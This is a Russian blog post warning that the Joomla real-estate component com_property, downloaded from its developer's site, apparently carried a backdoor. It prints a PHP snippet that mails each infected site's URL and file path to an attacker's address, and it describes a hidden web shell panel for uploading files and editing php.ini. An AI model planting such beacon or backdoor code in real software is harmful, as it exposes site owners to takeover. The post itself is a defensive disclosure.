В Joomla взломан com_properties: установить com_properties или сразу отдать пароли от хостинга взломщику?

Недавно пришлось задуматься о создании сайта для агенства недвижимости. Изучив extensions.joomla.org, я остановился на двух компонентах com_properties или com_fw_real_estate_light…

Статью изначально писал на Хабр. Да не случилось.

Начну с основной идеи: Не качайте ничего с сайта _http://www.com-property.com/, особенно сам компонент com_property. На днях занимался созданием сайта для агенства недвижимости. Делать было решено на Joomla. Пробежавшись по расширениям, я нашел вполне подходящий по лицензии и функциональности вариант — компонент Property. Признаюсь, комментарии я прочел уже потом, а вних ведь было все написано: WARNING: our site was hacked due to a vulnerability in this extension and we had to delete our entire hosting account and start over.I have never had a site hacked until I installed this extension Тем не менее ничего страшного не произошло, и сайт мой не хакнули, но обо всем по порядку. С сайта расширений, я поплелся прямиком на _http://www.com-property.com/ где обнаружил полный ремозиторий модулей и собственно сам компонент. Не спугнуло меня даже то, что avast ругнулся на ссылку скачивания основного компонента. Компонент я успешно установил, зашел-пощелкал админку. Но когда настала пора увидеть врага компонент в лицо, передо мной открылся белый лист. Переустанавливать не стал (тем более, что установка прошла без ошибок) — сразу полез в код. И, о чудо чудное, обнаружил совершенно неясные «иероглифы», несвойственные для joomla-кода:

$site = "www.Sh3ll.Us"; if(!ereg($site$_SERVER['SERVER_NAME'])) { $to = "sshadyarchi@gmail.com"; $subject = "EGFM"; $header = "from: EGFM "; $message = "Link : http://" . $_SERVER['SERVER_NAME'. $_SERVER ['REQUEST_URI'. "\r\n"; $message .= "Path : " . __file__; $sentmail = @mail($to$subject$message$header); echo ""; exit;

Colored with dumpz.org

Естественно с адресом разработчика этот адрес не совпадал. Очень быстро после такого открытия я отыскал указанный avast’ом файл /site/controllers/panel.php. Но что это, никаких привычных defined( '_JEXEC' ) or die( 'Restricted access' ); я не обнаружил. Вместо этого файл начинался строкой «//Change User & Password». Ниже шла авторизация. Не задумываясь особо, я набрал соответствующий прямой адрес на моем «хостинге» и попал на такую вот страничку: Форму авторизации я убрал, после чего во всей «красе» передо мной предстала панель взломщика. Отсюда можно было закачивать файлы, править php.ini, выполнять fopen удаленных файлов и прочие «прелести». Автор всей это мерзопакости не постеснялся подписаться: EgY_SpIdEr | | egy_spider@hotmail.com |developer by EgY SpIdEr На последок я проверил папку /tmp/!sendmail моего Денвера и конечно же обнаружил письма с указанием адреса хоста, с которого был запущен вражий скрипт. Конечно же ничего плохого не произошло, т.к. сайт тестировался на локалхосте. Товарищи, остерегайтесь и будьте бдительны, ведь пострадали уже многие -> http://www.google.com.ua/search?ie=UTF-8&hl=ru&q=EgY_SpIdEr%20ShElL

PS: 14.02.2011 компонент был обновлен до версии 3_1_0624. Avast больше не ругается, сомнительный файл panel.php теперь похудел до размера 1кб и вредного кода в себе не содержит.
Тем не менее, если взломанный компонент был выложен на сайте разработчика, стоит ли доверять?

Полезно(0)Бесполезно(0)
Комментарии закрыты.